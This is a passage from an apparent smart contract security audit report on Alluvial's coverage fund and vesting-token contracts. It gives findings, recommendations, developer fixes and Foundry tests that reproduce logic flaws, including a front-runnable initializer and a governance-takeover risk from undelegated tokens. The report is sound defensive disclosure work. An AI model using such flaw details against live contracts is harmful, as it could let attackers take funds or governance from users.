gets slashed so they can monitor it and cover it in case of slashing. (slashing being defined according to NXM policy), NXM will reimburse part or all of the lost ETH. The period between the slashing event occurs and the reimbursement that happens can go from 30 days up to 365 days. The reimbursement will go to the CoverageFund contract and subsequently be pulled into the core system respecting maximum bounds. • Sequence of Operations: 1. Liquid Collective submits a validator key to NXM to be covered. 2. A slashing event occurs (e.g a validator key gets slashed 1 ETH). 3. NXM monitoring catches the slashing event. 4. 30 days to 365 days later NXM reimburses 1 ETH to the CoverageFund. 12 5. 1 ETH gets progressively pulled from the CoverageFund into River respecting the bounds. Spearbit: Acknowledged as discussed with the Alluvial team, the impact of this issue is limited since the coverage fund should hold ETH only in case of a slashing event. +7.2.2 Consider preventing CoverageFundAddress to be set as address(0) Severity: Medium Risk Context: • River.1.sol#L176 • CoverageFundAddress.sol#L21 Description: In the current implementation of River.setCoverageFund and CoverageFundAddress.set both func- tion do not revert when the _newCoverageFund address parameter is equal to address(0). If the Coverage Fund address is empty, the River._pullCoverageFunds function will return earlier and will not pull any coverage fund. Recommendation: If having an empty coverage fund address equal to address(0) is the intended behavior, we suggest explaining in both the documentation and natspec comments the reason and document in which scenario this could happen. Otherwise, add inside the CoverageFundAddress.set function a sanity check on the new address and revert in case of _newValue == address(0). Alluvial: Added sanity check inside the CoverageFundAddress.set function in PR 169. Spearbit: Acknowledged. 7.3 Low Risk +7.3.1 CoverageFund.initCoverageFundV1 might be front-runnable Severity: Low Risk Context: CoverageFund.1.sol#L21 Description: Upgradeable contracts are used in the project, mostly relying on a TUPProxy contract. Initializing a contract is a 2 phase process where the first call is the actual deployment and the second call is a call to the init function itself. From our experience with the repository, the upgradeable contracts deployment scripts are using the TUPProxy correctly, however in that case we were not able to find the deployment script for CoverFund, so we decided to raise this point to make sure you are following the previous policy also for this contract. Recommendation: Use the same structure of deployment scripts that are used in other upgradeable contracts also for CoverFund to make sure that the initialization process is atomic (i.e - executed in a single transaction). Alluvial: Recommendation implemented in PR 170. Spearbit: Acknowledged. 13 +7.3.2 Account owner of the minted TLC tokens must call delegate to own vote power of initial minted tokens Severity: Low Risk Context: TLC.1.sol#L20 Description: ken.delegate(accountOwner) to auto-delegate to itself, otherwise it will have zero voting power. the minted TLC tokens must The _account owner of remember to call tlcTo- Without doing that anyone (even with just 1 voting power) could make any proposal pass and in the future manage the DAO proposing, rejecting or accepting/executing proposals. As the OpenZeppelin ERC20 documentation says: By default, token balance does not account for voting power. This makes transfers cheaper. The downside is that it requires users to delegate to themselves in order to activate checkpoints and have their voting power tracked. Recommendation: Remember to call tlcToken.delegate(accountOwner) after the deployment of the TLC to- ken. 7.4 Gas Optimization +7.4.1 Consider using unchecked block to save some gas Severity: Gas Optimization Context: ERC20VestableVotesUpgradeable.1.sol#L354-L356 Description: Because of the if statement, it is impossible for vestedAmount - releasedAmount to underflow, thus allowing the usage of the unchecked block to save a bit of gas. Recommendation: Consider implementing the code snippet below: if (vestedAmount > releasedAmount) { - + } return vestedAmount - releasedAmount; unchecked { return vestedAmount - releasedAmount; } • Gas diff: testReleaseVestingScheduleAfterLockDuration() (gas: -65 (-0.023%)) testReleaseVestingScheduleAtLockDuration() (gas: -65 (-0.023%)) testRevokeAtCliff() (gas: -65 (-0.025%)) testRevokeDefault() (gas: -65 (-0.025%)) testRevokeTwiceAfterEnd() (gas: -65 (-0.026%)) testReleaseVestingScheduleAfterRevoke() (gas: -130 (-0.044%)) testRevokeTwice() (gas: -130 (-0.048%)) testcomputeVestingAmounts() (gas: -195 (-0.059%)) testVestingScheduleFuzzing(uint24,uint32,uint8,uint8,uint256,uint256,uint256) (gas: -1732 (-0.595%)) Overall gas change: -2512 (-0.869%) Alluvial: Recommendation implemented in PR 172. Spearbit: Fixed. 14 7.5 Informational +7.5.1 createVestingSchedule allows the creation of a vesting schedule that could release zero tokens after a period has passed Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L368-L387 Description: Depending on the value of duration or amount it is possible to create a vesting schedule that would release zero token after a whole period has elapsed. This is an edge case scenario but would still be possible given that createVestingSchedule can be called by anyone and not only Alluvial. See the following test case for an example //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import "forge-std/Test.sol"; import "../src/TLC.1.sol"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearVestTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr("init"); bob = makeAddr("bob"); alice = makeAddr("alice"); carl = makeAddr("carl"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testDistributeZeroPerPeriod() public { // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 0 days, lockDuration: 0, duration: 365 days, period: 1 days, amount: 100, beneficiary: alice, delegatee: address(0), 15 revocable: true }) ); // One whole period pass and alice check how many tokens she can release vm.warp(block.timestamp + 1 days); uint256 releasable = tlc.computeVestingReleasableAmount(0); assertEq(releasable, 0); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } } Recommendation: Consider preventing TLC owner to create vesting schedules or add another check that would revert the creation of a vesting schedule if the amount of releasable token for each period is equal to zero. Alluvial: Recommendation has been implemented in PR 172. Spearbit: Fixed. 16 +7.5.2 CoverageFund - Checks-Effects-Interactions best practice is violated Severity: Informational Context: CoverageFund.1.sol#L35 CoverageFund.1.sol#L43 Description: We were not able to find any concrete instances of harmful reentrancy attack vectors in this contract, but it's recommended to follow the Checks-effects-interactions pattern anyway. Recommendation: Consider moving the "effects" (code lines that modify the storage) right before the "interac- tions" (external calls) Alluvial: Fixed in PR 168 by implementing auditor's recommendation. Spearbit: Fixed. +7.5.3 River contract allows setting an empty metadata URI Severity: Informational Context: River.1.sol#L181-L184, MetadataURI.sol#L33-L44 Description: The current implementation of River.setMetadataURI and MetadataURI.set both allow the current value of the metadata URI to be updated to an empty string. Recommendation: Consider adding a check inside MetadataURI.set (to follow the current project style) to revert in case _newValue is an empty string. Alluvial: Recommendation implemented in PR 167. Spearbit: Fixed. +7.5.4 Consider requiring that the _cliffDuration is a multiple of _period Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L158-L236 Description: When a vesting schedule is created via _createVestingSchedule, the only check made on _period parameter (other than being greater than zero) is that the _duration must be a multiple of _period. If after the _cliffDuration the user can already release the matured vested tokens, it could make sense to also require that _cliffDuration % _period == 0 Recommendation: Consider requiring that _cliffDuration % _period == 0 when a vesting schedule is cre- ated. Alluvial: Recommendation has been implemented in PR 172. Spearbit: Fixed. +7.5.5 Add documentation about the scenario where a vesting schedule can be created in the past Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L200-L202 Description: In the current implementation of ERC20VestableVotesUpgradeable _createVestingSchedule func- tion, there is no check for the _start value. This means that the creator of a vesting schedule could create a schedule that starts in the past. Allowing the creation of a vesting schedule with a past _start also influences the behavior of _revokeVestingSchedule (see ERC20VestableVotesUpgradeableV1 createVestingSchedule allows the creation of vesting schedules that have already ended and cannot be revoked). Recommendation: Consider documenting this behavior and the reason to allow vesting schedules with _start < block.timestamp. 17 Alluvial: The behavior has been documented in the PR 172. Spearbit: Fixed. +7.5.6 ERC20VestableVotesUpgradeableV1 createVestingSchedule allows the creation of vesting schedules that have already ended and cannot be revoked Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L158-L236, ERC20VestableVotesUpgradeable.1.sol#L243- L258 Description: The current implementation of _createVestingSchedule allows the creation of vesting schedules that • Start in the past: _start < block.timestamp. • Have already ended: _start + _duration < block.timestamp. Because of this behavior, in case of the creation of a past vesting schedule that has already ended • The _beneficiary can instantly call (if there's no lock period) releaseVestingSchedule to release the whole amount of tokens. • The creator of the vesting schedule cannot call revokeVestingSchedule because the new end would be in the past and the transaction would revert with an InvalidRevokedVestingScheduleEnd error. The second scenario is particularly important because it does not allow the creator to reduce the length or remove the schedule entirely in case the schedule has been created mistakenly or with a misconfiguration (too many token vested, lock period too long, etc...). Recommendation: Consider changing the behavior of _createVestingSchedule to at least prevent the creation of vesting schedules that are already ended because _start + _duration < block.timestamp. Spearbit: Alluvial acknowledges the behavior with PR 172. +7.5.7 getVestingSchedule returns misleading information if the vesting token creator revokes the sched- ule Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L71-L73 Description: The getVestingSchedule function returns the information about the created vesting schedule. The duration represents the number of seconds of the vesting period and the amount represents the number of tokens that have been scheduled to be released after the period end (or after lockDuration if it has been configured to be greater than end). If the creator of the vesting schedule calls revokeVestingSchedule, only the end of the vesting schedule struct will be updated. If external contracts or dApps rely only on the getVestingSchedule information there could be scenarios where they display or base their logic on wrong information. Consider the following example. Alluvial creates a vesting schedule for alice with the following config 18 { } "start": block.timestamp, "cliffDuration": 1 days, "lockDuration": 0, "duration": 10 days, "period": 1 days, "amount": 10, "beneficiary": alice, "delegatee": alice, "revocable": true This means that after 10 days, Alice would own in her balance 10 TLC tokens. If Alluvial calls revokeVestingSchedule before the cliff period ends, all of the tokens will be returned to Alluvial but the getVestingSchedule function would still display the same information with just the end attribute updated. An external dApp or contract that does not check the new end and compares it to cliffDuration, lockDura- tion, and period but only uses the amount would display the wrong number of vested tokens for Alice at a given timestamp. Recommendation: Consider documenting this behavior and explain how to display the correct information in all the scenarios, or update how getVestingSchedule returns the vesting schedule information. Another possible solution is to be very explicit on the meaning of each attribute, declaring that those are not real- time values but just the configuration used at the creation of the vesting schedule and that only the end attribute can change when revokeVestingSchedule is called. Alluvial should anyway take care to extensively document which is the best practice for a user, external contract or dApps to query the TLC contracts to gather the correct and up-to-date information relative to a vesting schedule. Spearbit: Alluvial has extended the natspec documentation of getVestingSchedule in PR 172 explaining that only the end field is updating when a schedule is revoked. No changes have been made to the getVestingSchedule code. +7.5.8 The computeVestingVestedAmount will return the wrong amount of vested tokens if the creator of the vested schedule revokes the schedule Severity: Informational Context: • ERC20VestableVotesUpgradeable.1.sol#L100-L103 • ERC20VestableVotesUpgradeable.1.sol#L368-L387 Description: The computeVestingVestedAmount will return the wrong amount of vested tokens if the creator of the vested schedule revokes the schedule. This function returns the value returned by _computeVestedAmount that relies on duration and amount while the only attribute changed by revokeVestingSchedule is the end. 19 function _computeVestedAmount(VestingSchedules.VestingSchedule memory _vestingSchedule, uint256 _time) internal pure returns (uint256) { if (_time < _vestingSchedule.start + _vestingSchedule.cliffDuration) { // pre-cliff no tokens have been vested return 0; } else if (_time >= _vestingSchedule.start + _vestingSchedule.duration) { // post vesting all tokens have been vested return _vestingSchedule.amount; } else { uint256 timeFromStart = _time - _vestingSchedule.start; // compute tokens vested for completly elapsed periods uint256 vestedDuration = timeFromStart - (timeFromStart % _vestingSchedule.period); return (vestedDuration * _vestingSchedule.amount) / _vestingSchedule.duration; } } If the creator revokes the schedule, the computeVestingVestedAmount would return more tokens compared to the amount that the user has vested in reality. Consider the following example. Alluvial creates a vesting schedule with the following config { } "start": block.timestamp, "cliffDuration": 1 days, "lockDuration": 0, "duration": 10 days, "period": 1 days, "amount": 10, "beneficiary": alice, "delegatee": alice, "revocable": true Alluvial then calls revokeVestingSchedule(0, uint64(block.timestamp + 5 days));. The effect of this trans- action would return 5 tokens to Alluvial and set the new end to block.timestamp + 5 days. If alice calls computeVestingVestedAmount(0) at the time uint64(block.timestamp + 7 days), it would return 7 because _computeVestedAmount would execute the code in the else branch. But alice cannot have more than 5 vested tokens because of the previous revoke. If alice calls computeVestingVestedAmount(0) at the time uint64(block.timestamp + duration)it would return 10 because _computeVestedAmount would execute the code in the else if (_time >= _vestingSchedule.start + _vestingSchedule.duration) branch. But alice cannot have more than 5 vested tokens because of the previous revoke. Attached test below to reproduce it: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import "forge-std/Test.sol"; import "../src/TLC.1.sol"; contract WrappedTLC is TLCV1 { 20 function __computeVestingReleasableAmount(uint256 vestingID, uint256 _time) external view returns (uint256) { ,! return _computeVestingReleasableAmount( VestingSchedules.get(vestingID), _deterministicVestingEscrow(vestingID), _time ); } } contract SpearTLCTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal creator; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr("init"); creator = makeAddr("creator"); bob = makeAddr("bob"); alice = makeAddr("alice"); carl = makeAddr("carl"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testIncorrectComputeVestingVestedAmount() public { vm.prank(initAccount); tlc.transfer(creator, 10); // create a vesting schedule for Alice vm.prank(creator); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 0 days, lockDuration: 0, // no lock duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); // creator call revokeVestingSchedule revoking the vested schedule setting the new end as half ,! of the duration // 5 tokens are returned to the creator and `end` is updated to the new value // this means also that at max alice will have 5 token vested (and releasable) vm.prank(creator); tlc.revokeVestingSchedule(0, uint64(block.timestamp + 5 days)); // We warp at day 7 of the schedule vm.warp(block.timestamp + 7 days); 21 // This should fail because alice at max have only 5 token vested because of the revoke assertEq(tlc.computeVestingVestedAmount(0), 7); // We warp at day 10 (we reached the total duration of the vesting) vm.warp(block.timestamp + 3 days); // This should fail because alice at max have only 5 token vested because of the revoke assertEq(tlc.computeVestingVestedAmount(0), 10); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } } Recommendation: Consider refactoring the code inside computeVestingVestedAmount to correctly handle the scenario when the vesting schedule has been revoked. Alluvial: Recommendation has been implemented in PR 172. Spearbit: Acknowledged. 22 +7.5.9 Consider writing clear documentation on how the voting power and delegation works Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol the OpenZeppelin Description: ERC20VotesUpgradeable contract. As the official OpenZeppelin documentation says (also reported in the Alluvial's natspec contract): ERC20VestableVotesUpgradeableV1 extension The an of is By default, token balance does not account for voting power. This makes transfers cheaper. The downside is that it requires users to delegate to themselves in order to activate checkpoints and have their voting power tracked. Because of how ERC20VotesUpgradeable behaves on voting power and delegation of voting power could be coun- terintuitive for normal users who are not aware of it, Alluvial should be very explicit on how users should act when a vesting schedule is created for them. When a Vote Token is transferred, ERC20VotesUpgradeable calls the hook _afterTokenTransfer function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual override { super._afterTokenTransfer(from, to, amount); _moveVotingPower(delegates(from), delegates(to), amount); } In this case, _moveVotingPower(delegates(from), delegates(to), amount); will decrease the voting power of delegates(from) by amount and will increase the voting power of delegates(to) by amount. This applies if some conditions are true, but you can see them here function _moveVotingPower( address src, address dst, uint256 amount ) private { if (src != dst && amount > 0) { if (src != address(0)) { (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[src], _subtract, ,! amount); emit DelegateVotesChanged(src, oldWeight, newWeight); } if (dst != address(0)) { (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[dst], _add, amount); emit DelegateVotesChanged(dst, oldWeight, newWeight); } } } When a vesting schedule is created, the creator has two options: 1) Specify a custom delegatee different from the beneficiary (or equal to it, but it's the same as option 2). 2) Leave the delegatee empty (equal to address(0)). • Scenario 1) empty delegatee OR delegatee === beneficiary (same thing) After creating the vesting schedule, the voting power of the beneficiary will be equal to the amount of tokens vested. If the beneficiary did not call tlc.delegate(beneficiary) previously, after releasing some tokens, its voting power will be decreased by the amount of released tokens. 23 • Scenario 2) delegatee !== beneficiary && delegatee !== address(0) Same thing as before, but now we have two different actors, one is the beneficiary and another one is the delegatee of the voting power of the vested tokens. If the beneficiary did not call tlc.delegate(vestingScheduleDelegatee) previously, after releasing some to- kens, the voting power of the current vested schedule's delegatee will be decreased by the amount of released tokens. • Related test for scenario 1 //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import "forge-std/Test.sol"; import "../src/TLC.1.sol"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearTLCTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr("init"); bob = makeAddr("bob"); alice = makeAddr("alice"); carl = makeAddr("carl"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testLosingPowerAfterRelease() public { // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, // no lock duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: false }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); assertEq(tlc.getVotes(alice), 10); 24 assertEq(tlc.balanceOf(alice), 0); // Cliff period has passed and Alice try to get the first batch of the vested token vm.warp(block.timestamp + 1 days); vm.prank(alice); tlc.releaseVestingSchedule(0); // Alice now owns the vested tokens just released but her voting power has decreased by the ,! amount released assertEq(tlc.getVotes(alice), 9); assertEq(tlc.balanceOf(alice), 1); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } } Recommendation: Consider writing clear documentation on how the voting power and delegation works and explains how both the beneficiary and delegatee of the vested schedule should act to prevent decreasing their voting power when vested tokens are released or transferred. Alluvial: Recommendation has been implemented in PR 172. Spearbit: Fixed. 25 +7.5.10 Fix mismatch between revert error message and code behavior Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L196 Description: The error message requires the schedule duration to be greater than the cliff duration, but the code allows it to be greater than or equal to the cliff duration. Recommendation: Update the condition to match the error or vice versa: - if (_cliffDuration > _duration) { + if (_cliffDuration >= _duration) { or duration"); - revert InvalidVestingScheduleParameter("Vesting schedule duration must be greater than the cliff ,! + revert InvalidVestingScheduleParameter("Vesting schedule duration must be greater than or equal to ,! the cliff duration"); Alluvial: Code behavior is correct, updated the error message in PR 172. Spearbit: Fixed. +7.5.11 Improve documentation and naming of period variable Severity: Informational Context: VestingSchedules.sol#L24 Description: Similar to Consider renaming period to periodDuration to be more descriptive, the variable name and documentation are ambiguous. We can give a more descriptive name to the variable and fix the documenta- tion. Recommendation: Change the variable to periodDuration and improve the documentation on both: struct VestingSchedule { ... // duration of the vesting period in seconds uint32 duration; // duration of a vesting period in seconds uint32 period; // amount of tokens granted by the vesting schedule // duration of the entire vesting (sum of all vesting period durations) uint32 duration; // duration of a single period of vesting uint32 periodDuration; ... - - - - - + + + + } Alluvial: Recommendation implemented in PR 172. Spearbit: Fixed. 26 +7.5.12 Consider renaming period to periodDuration to be more descriptive Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L153 Description: period can be confused as (for example) a counter or an id. Recommendation: Rename it to something more descriptive like periodDuration. Alluvial: Recommendation implemented in PR 172. Spearbit: Fixed. +7.5.13 Coverage funds might be left stuck in the contract Severity: Informational Context: OracleManager.1.sol#L79 Oracle.1.sol#L416 Description: The newly introduced coverage fund is a smart contract that holds ETH to cover a potential lsETH price decrease due to unexpected slashing events. Funds might be pulled from CoverageFundV1 to the River contract through setConsensusLayerData to cover the losses and keep the share price stable. _sanityChecks will revert if a major loss is reported in a single transaction, since the absolute difference between prevTotalEth and postTotalEth may be greater than the allowed value. Therefore, oracles will have to report this loss gradu- ally using multiple calls to reportConsensusLayerData, which will potentially cover a portion of the loss in each transaction by pulling that portion from the coverage fund. The coverage fund is an on-demand source of liquidity. Funds will be deposited to the CoverageFundV1 (and will be claimable by the River contract) only after a scrutiny process that makes sure the loss event matches the insurance policy. Thus, it may take a while for funds to be deposited to the CoverageFundV1 contract after a slashing event had occurred. The call to _pullCoverageFunds will not revert for the case where the required amount was not eventually pulled, rather, the execution will continue and by the end of the transaction, CLValidatorTotalBalance will hold the value of _validatorTotalBalance that reflects the already decreased value. The issue arises in case the stream of loss transactions (calls to reportCon- sensusLayerData) will be processed and executed before the coverage fund is loaded with ETH. Since the total loss is not accumulated, it may lead to funds that are left stuck in the CoverageFundV1 contract which can not be claimed by the River contract, leaving the lsETH price low. Consider the following example DepositedValidatorCount = 2 (2 active validators) CLValidatorTotalBalance = 64 relativeLowerBound = annualAprUpperBound = 500 (5%) ELFees = 0 (just for simplicity) No funds yet in the coverage fund Assuming no new deposits to the river contract • On T0 a slashing of 14 ETH occurred, leaving only 50 ETH in CL. Now oracles can not report the entire loss, due to the way _sanityChecks works. Oracles can only report a loss of 64*0.05 = 3.2 ETH in the first _pushToRiver transaction. • On T1 _pushToRiver is called with _totalBalance = 64 - 3.2 = 60.8 ETH. Assuming executionLayer- Fees = 0, setConsensusLayerData will try to pull _maxIncrease + 3.2 from the coverage fund, but since there are no funds there, the transaction will end up with CLValidatorTotalBalance = 60.8. • On T2 _pushToRiver is called again, this time with _totalBalance = 60.8 - 3.04 = 57.76 ETH. Assuming executionLayerFees = 0, setConsensusLayerData will try to pull _maxIncrease + 3.04 from the coverage fund, but since there are no funds there, the transaction will end up with CLValidatorTotalBalance = 57.76 ETH. • On T3 14 ETH are transferred to the coverage fund contract eventually. • On T4 _pushToRiver is called again, this time with _totalBalance = 57.76 * 0.95 = 54.872 ETH. As- suming T4-T2 = 384 seconds, maxIncrease = 57.76 * 0.05 * 384 / 31536000 ~ 0, executionLayer- Fees = 0, setConsensusLayerData will try to pull _maxIncrease + 2.888 ~ 2.88, this time successfully. The transaction will end up with CLValidatorTotalBalance = 57.76 ETH, CoverageFundV1.balance = 14 - 2.88 = 11.12 ETH. 27 Assuming the rest of the _pushToRiver transactions succeed, eventually, only 57.76 - 50 = 7.76 ETH will be claimed from the by the river contract, leaving the rest 14 - 7.76 = 6.24 ETH stuck in the coverage fund contract. Spearbit: Acknowledged, as communicated with the Alluvial team, this issue is less probable since the system is not going to be used in the way described above, i.e., reporting a slashing loss is not intended to be a gradual process, rather, the loss should be reported once coverage funds are ready to be pulled. However, we still want to emphasize that the issue is still possible in certain edge-case scenarios. +7.5.14 Consider removing coverageFunds variable and explicitly initialize executionLayerFees to zero Severity: Informational Context: OracleManager.1.sol#L100-L101 Description: Inside the OracleManager.setConsensusLayerData the coverageFunds variable is declared but never used. Consider cleaning the code by removing the unused variable. The executionLayerFees variable instead should be explicitly initialized to zero to not rely on compiler assump- tions. Recommendation: Consider removing coverageFunds variable and explicitly initialize executionLayerFees to zero. Alluvial: Recommendation has been implemented in PR 168. Spearbit: Fixed. +7.5.15 Consider renaming IVestingScheduleManagerV1 interface to IERC20VestableVotesUpgradeableV1 Severity: Informational Context: IVestingScheduleManager.1.sol Description: The IVestingScheduleManager interface contains all ERC20VestableVotesUpgradeableV1 needs to implement and use. the events, errors, and functions that Because there's no corresponding VestingScheduleManager contract implementation, it would make sense to rename the interface to IERC20VestableVotesUpgradeableV1. Recommendation: Consider renaming IVestingScheduleManagerV1 interface to IERC20VestableVotesUpgradeableV1. Alluvial: Recommendation has been implemented in PR 172. Spearbit: Fixed. +7.5.16 Consider renaming CoverageFundAddress COVERAGE_FUND_ADDRESS to be consistent with the current naming convention Severity: Informational Context: CoverageFundAddress.sol#L10 Description: Consider renaming the constant used to access the unstructured storage slot COVERAGE_FUND_- ADDRESS. To follow the naming convention already adopted across all the contracts, the variable should be renamed to COVERAGE_FUND_ADDRESS_SLOT. Recommendation: Consider renaming COVERAGE_FUND_ADDRESS in CoverageFundAddress to COVERAGE_FUND_- ADDRESS_SLOT to be consistent with the already adopted naming convention. Alluvial: Recommendation has been implemented in PR 168. Spearbit: Fixed. 28 +7.5.17 Consider reverting if the msg.value is zero in CoverageFundV1.donate Severity: Informational Context: CoverageFund.1.sol#L41-L46 Description: In the current implementation of CoverageFundV1.donate there is no check on the msg.value value. Because of this, the sender can "spam" the function and emit multiple useless Donate events. Recommendation: Consider reverting early, at the beginning of the function, if msg.value is equal to zero. Alluvial: Recommendation has been implemented in PR 168. Spearbit: Fixed. +7.5.18 Consider having a separate function in River contract that allows CoverageFundV1 to send funds instead of using the same function used by ELFeeRecipientV1 Severity: Informational Context: CoverageFund.1.sol#L35, River.1.sol#L192-L196 Description: When the River contract calls the CoverageFundV1 contract to pull funds, the CoverageFundV1 sends funds to River by calling IRiverV1(payable(river)).sendELFees{value: amount}();. sendELFees is a function that is currently used by both CoverageFundV1 and ELFeeRecipientV1. function sendELFees() external payable { if (msg.sender != ELFeeRecipientAddress.get() && msg.sender != CoverageFundAddress.get()) { revert LibErrors.Unauthorized(msg.sender); } } It would be cleaner to have a separate function callable only by the CoverageFundV1 contract. Recommendation: Consider adding to the River contract a separate function that allows the CoverageFundV1 to send ETH. If that function is implemented, remember to also remove the msg.sender != CoverageFundAd- dress.get() from the sendELFees implementation. Alluvial: Recommendation implemented in PR 168. Spearbit: Fixed. +7.5.19 Extensively document how the Coverage Funds contract works Severity: Informational Context: CoverageFund.1.sol Description: The Coverage Fund contract has a crucial role inside the Protocol, and the current contract's docu- mentation does not properly cover all the needed aspects. Consider documenting the following aspects: • General explanation of the Coverage Funds and it's purpose. • Will donations happen only after a slash/penalty event? Or is there a "budget" that will be dumped on the contract regardless of any slashing events? • If a donation of XXX ETH is made, how is it handled? In a single transaction or distributed over a period of time? • Explain carefully that when ETH is donated, no shares are minted. • Explain all the possible market repercussions of the integration of Coverage Funds. • Is there any off-chain validation process before donating? 29 • Who are the entities that are enabled to donate to the fund? • How is the Coverage Funds integrated inside the current Alluvial protocol? • Any additional information useful for the users, investors, and other actors that interact with the protocol. Recommendation: Consider extending the current documentation of the CoverageFund contract to deeply explain how the coverage funds works and how it interacts with the whole Protocol. Alluvial: Natspec extended in PR 168. Spearbit: Fixed. +7.5.20 Missing/wrong natspec comment and typos Severity: Informational Context: • IVestingScheduleManager.1.sol#L48 • IVestingScheduleManager.1.sol#L56 • IVestingScheduleManager.1.sol#L77-L98 • IVestingScheduleManager.1.sol#L111-L114 • VestingSchedules.sol#L37 • VestingSchedules.sol#L82 • ERC20VestableVotesUpgradeable.1.sol#L313-L315 • ERC20VestableVotesUpgradeable.1.sol#L334-L335 • ERC20VestableVotesUpgradeable.1.sol#L389 • Oracle.1.sol#L410-L411 • ICoverageFund.1.sol#L17-L18 • VestingSchedules.sol#L19-L20 • VestingSchedules.sol#L11-L33 • ERC20VestableVotesUpgradeable.1.sol#L41-L42 • ERC20VestableVotesUpgradeable.1.sol#L59-L61 • ERC20VestableVotesUpgradeable.1.sol#L147 • ERC20VestableVotesUpgradeable.1.sol#L156 • ERC20VestableVotesUpgradeable.1.sol#L36-L45 Description: • Natspec • Missing part of the natspec comment for /// @notice Attempt to revoke at a relative to InvalidRevokedVestingScheduleEnd in IVestingScheduleManager • Natspec missing the @return part for getVestingSchedule in IVestingScheduleManager. • Wrong order of natspec @param for createVestingSchedule in IVestingScheduleManager. The @param _beneficiary should be placed before @param _delegatee to follow the function signature order. • Natspec missing the @return part for delegateVestingEscrow in IVestingScheduleManager. • Wrong natspec comment, operators should be replaced with vesting schedules for @custom:attribute of struct SlotVestingSchedule in VestingSchedules. 30 • Wrong natspec parameter, replace operator with vesting schedule in the VestingSchedules.push func- tion. • Missing @return natspec for _delegateVestingEscrow in ERC20VestableVotesUpgradeable. • Missing @return natspec for _deterministicVestingEscrow in ERC20VestableVotesUpgradeable. • Missing @return natspec for _getCurrentTime in ERC20VestableVotesUpgradeable. • Add the Coverage Funds as a source of "extra funds" in the Oracle._pushToRiver natspec documentation in Oracle. • Update the InvalidCall natspec in ICoverageFundV1 given that the error is thrown also in the receive() external payable function of CoverageFundV1. • Update the natspec of struct VestingSchedule lockDuration attribute in VestingSchedules by explaining that the lock duration of a vesting schedule could possibly exceed the overall duration of the vesting. • Update the natspec of lockDuration in ERC20VestableVotesUpgradeable by explaining that the lock dura- tion of a vesting schedule could possibly exceed the overall duration of the vesting. • Consider making the natspec documentation of struct VestingSchedule in VestingSchedules and the natspec in ERC20VestableVotesUpgradeable be in sync. • Add more examples (variations) to the natspec documentation of the vesting schedules example in ERC20VestableVotesUpgradeable to explain all the possible combination of scenarios. • Make the ERC20VestableVotesUpgradeable natspec documentation about the vesting schedule consis- tent with the natspec documentation of _createVestingSchedule and VestingSchedules struct Vest- ingSchedule. • Typos • Replace all Overriden instances with Overridden in River. • Replace transfer with transfers in ERC20VestableVotesUpgradeable.1.sol#L147. • Replace token with tokens in ERC20VestableVotesUpgradeable.1.sol#L156. Recommendation: Consider adding or updating the relative natspec where needed, and fix the word typos. Alluvial: Recommendation has been implemented in PR 172. Spearbit: Fixed. +7.5.21 Different 